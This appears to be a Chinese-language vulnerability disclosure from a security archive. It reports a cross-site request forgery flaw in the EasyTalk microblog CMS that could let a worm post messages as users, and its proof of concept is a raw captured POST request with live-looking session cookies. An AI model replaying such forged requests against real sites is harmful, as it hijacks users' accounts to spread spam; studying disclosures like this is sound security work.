VULHUB ™

### 简要描述： easytalk是一个，优秀的开源微博CMS ### 详细说明： easytalkCSRF可蠕虫发微博 可用于各个方面，例如广告传销，一发不可收拾 ### 漏洞证明： 抓包得： ``` POST /?m=space&a=sendmsg HTTP/1.1 Host: t.nextsns.com Connection: Keep-Alive Content-Length: 51 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; SE 2.X MetaSr 1.0) accept-language: zh-cn content-type: application/x-www-form-urlencoded x-requested-with: XMLHttpRequest Referer: http://t.nextsns.com/?aaaaassss Accept-Encoding: gzip, deflate Cookie: Hm_lvt_a8430e60d731ee48d6af1a7f5be443cb=1380280087; Hm_lpvt_a8430e60d731ee48d6af1a7f5be443cb=1380280087; think_language=zh-cn; SSXTID=8c9639fad140162f9b6ba096a2ed6192; CNZZDATA2926394=cnzz_eid%3D1360978696-1380280089-http%253A%252F%252Ft.nextsns.com%26ntime%3D1380280089%26cnzz_a%3D0%26retime%3D1380280090818%26sin%3Dhttp%253A%252F%252Fwww.nextsns.com%252F%26ltime%3D1380280090818%26rtime%3D0; starttime=1380280328255;...

### 简要描述： easytalk是一个，优秀的开源微博CMS ### 详细说明： easytalkCSRF可蠕虫发微博 可用于各个方面，例如广告传销，一发不可收拾 ### 漏洞证明： 抓包得： ``` POST /?m=space&a=sendmsg HTTP/1.1 Host: t.nextsns.com Connection: Keep-Alive Content-Length: 51 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; SE 2.X MetaSr 1.0) accept-language: zh-cn content-type: application/x-www-form-urlencoded x-requested-with: XMLHttpRequest Referer: http://t.nextsns.com/?aaaaassss Accept-Encoding: gzip, deflate Cookie: Hm_lvt_a8430e60d731ee48d6af1a7f5be443cb=1380280087; Hm_lpvt_a8430e60d731ee48d6af1a7f5be443cb=1380280087; think_language=zh-cn; SSXTID=8c9639fad140162f9b6ba096a2ed6192; CNZZDATA2926394=cnzz_eid%3D1360978696-1380280089-http%253A%252F%252Ft.nextsns.com%26ntime%3D1380280089%26cnzz_a%3D0%26retime%3D1380280090818%26sin%3Dhttp%253A%252F%252Fwww.nextsns.com%252F%26ltime%3D1380280090818%26rtime%3D0; starttime=1380280328255; authcookie=czo2MzoiMTlhMWFHQmN4KzdSR1VNMWVxTjYwc2FsdDhWcUZuU2YxQURvR1UxSlcxVHVCMU9NYzZyV1UwbVZpR2tSb0c4Ijs%3D content=tset&morecontent=&sendsina=0&sendqq=0&from= ``` Poc： ``` POST /?m=space&a=sendmsg HTTP/1.1 Host: t.nextsns.com Connection: Keep-Alive Content-Length: 51 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; SE 2.X MetaSr 1.0) accept-language: zh-cn content-type: application/x-www-form-urlencoded x-requested-with: XMLHttpRequest Referer: http://t.nextsns.com/?aaaaassss Accept-Encoding: gzip, deflate Cookie: Hm_lvt_a8430e60d731ee48d6af1a7f5be443cb=1380280087; Hm_lpvt_a8430e60d731ee48d6af1a7f5be443cb=1380280087; think_language=zh-cn; SSXTID=8c9639fad140162f9b6ba096a2ed6192; CNZZDATA2926394=cnzz_eid%3D1360978696-1380280089-http%253A%252F%252Ft.nextsns.com%26ntime%3D1380280089%26cnzz_a%3D0%26retime%3D1380280090818%26sin%3Dhttp%253A%252F%252Fwww.nextsns.com%252F%26ltime%3D1380280090818%26rtime%3D0; starttime=1380280328255; authcookie=czo2MzoiMTlhMWFHQmN4KzdSR1VNMWVxTjYwc2FsdDhWcUZuU2YxQURvR1UxSlcxVHVCMU9NYzZyV1UwbVZpR2tSb0c4Ijs%3D content=tset&morecontent=&sendsina=0&sendqq=0&from= ``` 测试结果： [<img src="https://images.seebug.org/upload/201309/27195309d27748e87cecdda1b9cb5ce4f1651c01.png" alt="wooyun4.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/27195309d27748e87cecdda1b9cb5ce4f1651c01.png)